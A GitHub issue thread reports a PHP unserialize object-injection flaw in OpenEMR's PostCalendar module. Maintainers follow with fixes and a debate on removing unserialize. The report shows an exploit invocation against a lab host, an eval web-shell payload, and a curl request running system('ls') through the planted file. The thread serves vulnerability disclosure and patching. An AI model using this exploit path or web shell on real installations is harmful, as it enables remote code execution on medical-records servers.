### ISSUE TITLE
unserialize call in PostCalendar/pnuser.php may lead to RCE

### ISSUE THREAD

**Issue by neex** [openemr/openemr#2454]
This issue is a particular example of #1984.

`unserialize` php function is called on user data in function `postcalendar_user_submit` of `interface/main/calendar/modules/PostCalendar/pnuser.php`:

```php
...
        $cat = $_POST['category'];
        $category = unserialize(base64_decode($cat));
...
```

This function can be triggered by any authorized user by visiting `http://openemr-installation/interface/main/calendar/index.php?module=PostCalendar&type=user&func=submit`.

The exploitation example which triggers (over)write of a chosen file with something like `<?php eval($_GET["cmd"); ?>` could be found at https://gist.github.com/neex/e248f268336cd888e9ba3580ae63c41f.

```
# Assume there is an openemr instance at http://172.17.0.4/,
# which has user "hui" with password "huihuihui"

$ python3 unserialize_exploit.py http://172.17.0.4/ hui huihuihui --filename zalupa.php
Maybe it worked!
$ curl 'http://172.17.0.4/interface/main/calendar/zalupa.php?cmd=system("ls");'
Date: Tue, 28 May 2019 11:02:47 +0000

add_edit_event.php
config.php
find_appt_popup.php
find_group_popup.php
find_patient_popup.php
findfirstapp.php
hui.php
includes
index.php
modules
pidor.php
pntables.php
zalupa.php
```

**Comment by bradymiller** [comment]
Confirmed issue and researching strategy to fix this.

**Comment by bradymiller** [comment]
short term fix in codebase now:
https://github.com/openemr/openemr/pull/2456

working on better fix here:
https://github.com/openemr/openemr/pull/2457

(btw @neex , thanks for this report)

**Comment by danehrlich1** [comment]
Unserialize needs to be removed throughout the entire codebase. @bradymiller going to message you now.

**Comment by sjpadgett** [comment]
I may agree using json is a better choice but simply doing another wrapper function that will still leave a vulnerability is not a solution to me. Plus you're not really sanitizing but adding a parameter to an existing function call. This gets confusing to future devs as if hey, I can use this because it is sanitized. You have to look at how the data interchanges are being used to determine exposure.
In the end, if we are going to make these php functions taboo in OpenEMR then let us address now so there isn't any ambiguities and not wrapper core php functions as if somehow they're useless.
@danehrlich1 if you want to remove unserialize throughout then by all means do so but please, do not usurp my opinions on this matter with some blanket statement "Unserialize needs to be removed throughout the entire codebase" after I commented of a different way to address this issue #2457.

**Comment by bradymiller** [comment]
Yep, no need to lose our heads here :)
Probably be a week before the "working on better fix" will be ready (note that current "sanitize" function is really just a crutch for me as I sort out the use cases and way forward.
(as an aside, there is at least one key place where removing unserialize would be detrimental in the recurrent appt piece, and with 7.1, which is required for openemr 5.0.2, using unserialize with the additional parameter should be ok in certain use cases)

**Comment by bradymiller** [comment]
Committed a medium term fix here:
https://github.com/openemr/openemr/pull/2457

Plan a longer term fix where look at each use case and convert it to something else (if it makes sense to change it to something else).

**Comment by bradymiller** [comment]
The specific vulnerability is fixed in codebase now (the offending code no longer even exists :) ), so will close this issue and continue generic work on the unserialize issue here:
https://github.com/openemr/openemr/issues/1984
